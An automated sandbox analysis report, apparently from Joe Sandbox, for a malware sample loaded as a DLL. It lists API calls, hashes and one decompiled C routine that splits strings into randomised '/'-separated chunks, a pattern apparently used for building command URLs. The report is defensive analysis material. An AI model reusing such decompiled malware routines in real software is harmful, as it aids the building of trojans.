                0x01c13200
                0x01c13200
                0x01c13206
                0x01c13208
                0x01c1320d
                0x01c13216
                0x01c1321e
                0x01c13221
                0x01c1322c
                0x01c13230
                0x01c13232
                0x01c13233
                0x01c1323c
                0x01c13240
                0x01c13251
                0x01c13242
                0x01c13247
                0x01c1324c
                0x01c1325b
                0x01c1325b
                0x01c13230
                0x01c13261
                0x01c13267
                0x01c13267
                0x01c13270
                0x01c13275
                0x01c13275
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeSleepStringlstrlenmemcpy
                • String ID:
                • API String ID: 1198164300-0
                • Opcode ID: 88a8cbab5c9e32b3d7498e3f024e236788241d16754be22f2116404ddd1f4950
                • Instruction ID: 24f392cac05e16bf8131c64c4cf2557a7b105e36bead5b82b95ad74343fcf08c
                • Opcode Fuzzy Hash: 88a8cbab5c9e32b3d7498e3f024e236788241d16754be22f2116404ddd1f4950
                • Instruction Fuzzy Hash: E6217475A40249EFDB10EFA8C884DDEBBB8FF4A314B104169E905E7215D730EB01DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D0C78 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046D0C9A
                • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 046D0CDE
                • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 046D0D21
                • CloseHandle.KERNEL32(?,?,?,?,?), ref: 046D0D44
                  • Part of subcall function 046E2449: GetTickCount.KERNEL32 ref: 046E2459
                  • Part of subcall function 046E2449: CreateFileW.KERNEL32(046DA7DD,80000000,00000003,046EE268,00000003,00000000,00000000,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E2476
                  • Part of subcall function 046E2449: GetFileSize.KERNEL32(046DA7DD,00000000,?,00000001,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24A9
                  • Part of subcall function 046E2449: CreateFileMappingA.KERNEL32(046DA7DD,046EE268,00000002,00000000,00000000,046DA7DD), ref: 046E24BD
                  • Part of subcall function 046E2449: lstrlen.KERNEL32(046DA7DD,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24D9
                  • Part of subcall function 046E2449: lstrcpy.KERNEL32(?,046DA7DD), ref: 046E24E9
                  • Part of subcall function 046E2449: HeapFree.KERNEL32(00000000,046DA7DD,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E2504
                  • Part of subcall function 046E2449: CloseHandle.KERNEL32(046DA7DD,?,00000001,?,046DA7DD), ref: 046E2516
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                • String ID:
                • API String ID: 3239194699-0
                • Opcode ID: 90fdd075d78b6924f705fab77626c39815eb77b520a48f49ae66c4fa5519e311
                • Instruction ID: bb712292e16538d9c21f6b73b383e0bcd4d5cedcdbe129bf7ffa45023cc041c7
                • Opcode Fuzzy Hash: 90fdd075d78b6924f705fab77626c39815eb77b520a48f49ae66c4fa5519e311
                • Instruction Fuzzy Hash: 6F214F71900208EBDB21DF66DD44DEE7BB9EF58318F14052AF916972A0F731E945CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DD0DD Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046DD10C
                • lstrlen.KERNEL32(00000000), ref: 046DD11C
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • strcpy.NTDLL ref: 046DD133
                • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 046DD13D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrlenmemsetstrcpy
                • String ID:
                • API String ID: 528014985-0
                • Opcode ID: 3585c033ab12f50aacacf65d85c28beba05f823fb8c834a69daed8f9e7fd7185
                • Instruction ID: 12b1a36ff863dfedfcb6f4d43408e57c01a2593cca32d505f1af02a32f6e06b1
                • Opcode Fuzzy Hash: 3585c033ab12f50aacacf65d85c28beba05f823fb8c834a69daed8f9e7fd7185
                • Instruction Fuzzy Hash: F121A972900702AFE720BF24DC48A6A77F9EB58351F009419F9668B281FB78E8048B65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E5DDB Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E5DF1
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E5E0C
                • GetLastError.KERNEL32(?,?,?), ref: 046E5E7A
                • GetLastError.KERNEL32(?,?,?), ref: 046E5E89
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalErrorLastSection$EnterLeave
                • String ID:
                • API String ID: 2124651672-0
                • Opcode ID: f1816d5277fa67521fedb1182139bd43cddab82406f0a3ed50683f449f4aa6d3
                • Instruction ID: 23213a30e12b056c723892227936c5132eed89a89d9bf396ecd2d8acf2de4907
                • Opcode Fuzzy Hash: f1816d5277fa67521fedb1182139bd43cddab82406f0a3ed50683f449f4aa6d3
                • Instruction Fuzzy Hash: C4214836901209EFCB119FAAD804AAEBBF8FF58714F048155F802E7250E735EE159BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DBCE7 Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,046DBCFE), ref: 046CE9D6
                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 046DBD39
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,046D6B93,?), ref: 046DBD4B
                • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,046D6B93,?), ref: 046DBD63
                • CloseHandle.KERNEL32(?,?,?,?,?,?,046D6B93,?), ref: 046DBD7E
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CloseCreateHandleModuleNamePointerRead
                • String ID:
                • API String ID: 1352878660-0
                • Opcode ID: beb6d7c7c13645a1557beedfed1483d47f1fd2dd5dfb049384c11fd7c0ddda2d
                • Instruction ID: 4bce5bb81b0debb640c39d1b44bf1769c35892b3b814a2db9956ce607eb3255a
                • Opcode Fuzzy Hash: beb6d7c7c13645a1557beedfed1483d47f1fd2dd5dfb049384c11fd7c0ddda2d
                • Instruction Fuzzy Hash: 6B116371900118BBDF20AF65CC88EEF7E7DEF01B54F104115F502E6194E771AE40CAA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D4D6C Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(8B000000,046CB526,?,046CB526,00000004), ref: 046D4DA4
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpy.KERNEL32(00000000,8B000000), ref: 046D4DBB
                • StrChrA.SHLWAPI(00000000,0000002E,?,046CB526,00000004), ref: 046D4DC4
                • GetModuleHandleA.KERNEL32(00000000,?,046CB526,00000004), ref: 046D4DE2
                  • Part of subcall function 046D8CCE: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,8B000000,?,00000004,00000000,00000004,00000002,00000000,?), ref: 046D8DA5
                  • Part of subcall function 046D8CCE: VirtualProtect.KERNELBASE(046CB73B,00000004,00000002,00000002,?,00000004,00000000,00000004,00000002,00000000,?,00000000,00000000,046EA580,0000001C,046DBB7F), ref: 046D8DC0
                  • Part of subcall function 046D8CCE: RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D8DE4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                • String ID:
                • API String ID: 105881616-0
                • Opcode ID: 15a0cf2cec227a79ac15e086c740cb7f7e6f299f378d503ed3fdaa08cd3d5bf7
                • Instruction ID: 1f08ef20cc277e6a70dd36a3a8503f0f34f0b9bd3bf5e25fc30b23bdd1e33033
                • Opcode Fuzzy Hash: 15a0cf2cec227a79ac15e086c740cb7f7e6f299f378d503ed3fdaa08cd3d5bf7
                • Instruction Fuzzy Hash: 5E211874A00205EFDB20EF65C988AAEBBF9FF54304F108059E4559B350EBB4EE41DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E5B2E Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,00000000,74E48250,74E069A0,?,?,?,046CB28E,?,00000000,00000001), ref: 046E5B3E
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,046CB28E,?,00000000,00000001), ref: 046E5B60
                • lstrcpyW.KERNEL32(00000000,?), ref: 046E5B8C
                • lstrcatW.KERNEL32(00000000,?), ref: 046E5B9F
                  • Part of subcall function 046DE67F: strstr.NTDLL ref: 046DE757
                  • Part of subcall function 046DE67F: strstr.NTDLL ref: 046DE7AA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 3712611166-0
                • Opcode ID: ada5ce5fbca9a3494f71005588865cb928f5fcbed1e73742c2843a74569390f7
                • Instruction ID: 54ee430e9a2adcbfde263033a980a20b46351d35c899b38c6801cf6f8b1bd4ad
                • Opcode Fuzzy Hash: ada5ce5fbca9a3494f71005588865cb928f5fcbed1e73742c2843a74569390f7
                • Instruction Fuzzy Hash: 31110772501219FFDB11AFA6CC88DEF7BADEF04299B004468F9059B210E775EE41DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D6DFA Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 046D6E15
                • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 046D6E39
                • RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 046D6E91
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 046D6E62
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: QueryValue$AllocateCloseHeapOpen
                • String ID:
                • API String ID: 453107315-0
                • Opcode ID: ec05cc34373de30e2d7ae3f9bc45ac103107ddce871ba38f0aa5f785adbfb34c
                • Instruction ID: d68a0a1fc802c63765713c399a32c16c96eb7792142aa3676da9f50d4820ddb1
                • Opcode Fuzzy Hash: ec05cc34373de30e2d7ae3f9bc45ac103107ddce871ba38f0aa5f785adbfb34c
                • Instruction Fuzzy Hash: F221EAB590010DFFDB119F95C9808EEBBBDEF94344F104556F801AA220E771AA55DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12A4E Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E01C12A4E(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x1c1a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x1c1a2a8; // 0x68e6c898
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x1c1a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                0x01c12a56
                0x01c12a59
                0x01c12a5f
                0x01c12a77
                0x01c12a7b
                0x01c12a7e
                0x01c12a80
                0x01c12a83
                0x01c12a85
                0x01c12a88
                0x01c12a8a
                0x01c12a8a
                0x01c12a8c
                0x01c12a97
                0x01c12a9c
                0x01c12aad
                0x01c12ab5
                0x01c12aba
                0x01c12abd
                0x01c12ac0
                0x01c12ac2
                0x01c12ac8
                0x01c12acb
                0x01c12acb
                0x01c12acb
                0x01c12ad6
                0x01c12adb
                0x01c12ae5

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01C15357,00000000,?,?,01C17675,?,021795B0), ref: 01C12A59
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 01C12A71
                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,01C15357,00000000,?,?,01C17675,?,021795B0), ref: 01C12AB5
                • memcpy.NTDLL(00000001,?,00000001), ref: 01C12AD6
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: a5aa25a0ce7ee890d903fa37788444189e29505296bbd1f88199cc14db6c5805
                • Instruction ID: 1e257c7405b9937983c147a03d17cb294aa1491b8e69bc94c3792032d6ca79d9
                • Opcode Fuzzy Hash: a5aa25a0ce7ee890d903fa37788444189e29505296bbd1f88199cc14db6c5805
                • Instruction Fuzzy Hash: CB115572A40159FFC3208B69DC84E9EBFFEEB92260B150176F50AD7244EA71DE0097A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D1023 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C6535,00000000,?,?,046D09CA,00000000,04C9C0E0), ref: 046D102E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D1046
                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,046C6535,00000000,?,?,046D09CA,00000000,04C9C0E0), ref: 046D108A
                • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 046D10AB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: 32e462be2dd9d5abcf4ec4bda508bda322ad2b98124c2f5212ab32a218f5d44b
                • Instruction ID: 7e737c6342b33d224e2b5aab427ab896386f0358ad4b34a0c6a9b27734cec157
                • Opcode Fuzzy Hash: 32e462be2dd9d5abcf4ec4bda508bda322ad2b98124c2f5212ab32a218f5d44b
                • Instruction Fuzzy Hash: 82112972E00258AFD710DF6ADC84DDEBBEDDB92260B040176F805DB240FAB5AE4487A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DB2CB Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                Download Yara Rule
                APIs
                • GlobalFix.KERNEL32(00000000), ref: 046DB30B
                • memset.NTDLL ref: 046DB31F
                • GetWindowThreadProcessId.USER32(00000000,?), ref: 046DB32C
                  • Part of subcall function 046CED0A: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 046CED64
                  • Part of subcall function 046CED0A: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C), ref: 046CED82
                  • Part of subcall function 046CED0A: GetSystemTimeAsFileTime.KERNEL32(?), ref: 046CEDE8
                • GlobalUnWire.KERNEL32(00000000), ref: 046DB357
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                • String ID:
                • API String ID: 3286078456-0
                • Opcode ID: 69988ecc52acd52666ead1dcf40e95727693aea30c8df9141566f200deca6cdc
                • Instruction ID: 1fd82963d85e917bc4b62448320150ee16d4514cf46410e55634ae71fb6d37a0
                • Opcode Fuzzy Hash: 69988ecc52acd52666ead1dcf40e95727693aea30c8df9141566f200deca6cdc
                • Instruction Fuzzy Hash: 47118A71D00706AFD711AFA59848BEE77FCEF48B10F055016F905E6240FB75E9008B65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E50BE Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                Download Yara Rule
                APIs
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,046D432D,00000000,00000000), ref: 046E50DC
                • GetLastError.KERNEL32(?,00000000,?,046D432D,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,046D5B52,?,0000001E), ref: 046E50E4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ByteCharErrorLastMultiWide
                • String ID:
                • API String ID: 203985260-0
                • Opcode ID: f50059e85af205e50f1db94e27db7dc4ded3d1f65478a91b158dca4595042074
                • Instruction ID: 34a0c1ce7d198f82a763446f91db03aef3166cab2c018f37b7856a162c44071c
                • Opcode Fuzzy Hash: f50059e85af205e50f1db94e27db7dc4ded3d1f65478a91b158dca4595042074
                • Instruction Fuzzy Hash: 3801D436149251BF8730AE678C4CC7BBAEDEBC6768B10461DF47293280FA21A801C671
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CB914 Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000008,?,00000008,00000000,?,?,046C6761,?,?,?,?,?,?,?,?,?), ref: 046CB928
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • mbstowcs.NTDLL ref: 046CB942
                • lstrlen.KERNEL32(?,?,00000008), ref: 046CB94D
                • mbstowcs.NTDLL ref: 046CB967
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD43D
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD490
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?), ref: 046DD498
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD4BB
                  • Part of subcall function 046DD39D: wcscpy.NTDLL ref: 046DD4CD
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                • String ID:
                • API String ID: 1961997177-0
                • Opcode ID: edb3090a28538d360f2fb1941c6723f371362cb6c33af29d5c72270d8a8c00ad
                • Instruction ID: ccf5ee6b45d9372681470acdc628d271339027a85c69a93653a0d449965efdf3
                • Opcode Fuzzy Hash: edb3090a28538d360f2fb1941c6723f371362cb6c33af29d5c72270d8a8c00ad
                • Instruction Fuzzy Hash: 2701B173900204BBDB227BA59C86FAF7BADEF85754F10442EB60597100FAB5F91087A8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DA46B Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?), ref: 046DA478
                • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 046DA49E
                • lstrcpy.KERNEL32(00000014,?), ref: 046DA4C3
                • memcpy.NTDLL(?,?,?), ref: 046DA4D0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 1388643974-0
                • Opcode ID: fa48bc7c485417f7dd0de3233b3f986eb1d015e42c012b5de0c3088fd20c6fab
                • Instruction ID: 3bf6c494a88482ff32df9ac053e287b59ff1530ba73e3198125513701ee04847
                • Opcode Fuzzy Hash: fa48bc7c485417f7dd0de3233b3f986eb1d015e42c012b5de0c3088fd20c6fab
                • Instruction Fuzzy Hash: 8C11467190470AEFC721DF58D884E9ABBF8FB48714F10842EF85A8B610E775E954DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C27B5 Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,046DAB7C,?,00000000,00000000), ref: 046C27C8
                • lstrlen.KERNEL32(04C9BF48,?,046DAB7C,?,00000000,00000000), ref: 046C27E9
                • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 046C2801
                • lstrcpy.KERNEL32(00000000,04C9BF48), ref: 046C2813
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                • String ID:
                • API String ID: 1929783139-0
                • Opcode ID: 63133f023c85835c8e29b8576a9cf7eab542b69ee6e220a7a3d9c18f01d959e4
                • Instruction ID: c621ac782c182aebea1166ab2b006347f53458c6c51e80fa19185c7a1c9688fb
                • Opcode Fuzzy Hash: 63133f023c85835c8e29b8576a9cf7eab542b69ee6e220a7a3d9c18f01d959e4
                • Instruction Fuzzy Hash: C101C876904244EBD311EBADE884E6FBBFCEB88204F04406DED09D7241F6359A48C771
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D6126 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • RtlInitializeCriticalSection.NTDLL(046EE480), ref: 046D614A
                • RtlInitializeCriticalSection.NTDLL(046EE460), ref: 046D6160
                • GetVersion.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D6171
                • GetModuleHandleA.KERNEL32(000015DB,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D61A5
                  • Part of subcall function 046CADC7: GetModuleHandleA.KERNEL32(?,00000001,77639EB0,00000000,?,?,?,?,00000000,046D6188), ref: 046CADDF
                  • Part of subcall function 046CADC7: LoadLibraryA.KERNEL32(?), ref: 046CAE80
                  • Part of subcall function 046CADC7: FreeLibrary.KERNEL32(00000000), ref: 046CAE8B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                • String ID:
                • API String ID: 1711133254-0
                • Opcode ID: 233a868f03ad63000f17388493c8e0f634d4e08efbb7718cedc636cadfd93baf
                • Instruction ID: 1009e1f0731bc1c5e2a69a12ccfa476a579618d0c9872da951158f32f828b4c7
                • Opcode Fuzzy Hash: 233a868f03ad63000f17388493c8e0f634d4e08efbb7718cedc636cadfd93baf
                • Instruction Fuzzy Hash: 44118071E11311DFE710AFABE8456153BE4F78C318B00292AE105DB242F77ABC448F54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C73E0 Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?,7673D3B0,?,74E05520,046C3184,00000000,?,?,?,74E5F710,00000000,00000000), ref: 046C73E7
                • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 046C73FF
                • memcpy.NTDLL(0000000C,?,00000001), ref: 046C7415
                  • Part of subcall function 046E2ADA: StrChrA.SHLWAPI(00000020,?,7673D3B0,04C9C0D4,00000000,?,046E321D,?), ref: 046E2AFF
                  • Part of subcall function 046E2ADA: StrTrimA.SHLWAPI(00000020,046EA4A4,00000000,?,046E321D,?), ref: 046E2B1E
                  • Part of subcall function 046E2ADA: StrChrA.SHLWAPI(00000020,?,?,046E321D,?), ref: 046E2B2A
                • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 046C7447
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                • String ID:
                • API String ID: 3208927540-0
                • Opcode ID: 94b6134d7408db73b9d2ae7d69bcfdae0dfce5f7eb250ae1dc36fb46c50f8569
                • Instruction ID: 6bc48f96ac4732f66e0b4b3369c977e7db94c15d27c187a938fa1b0496e83947
                • Opcode Fuzzy Hash: 94b6134d7408db73b9d2ae7d69bcfdae0dfce5f7eb250ae1dc36fb46c50f8569
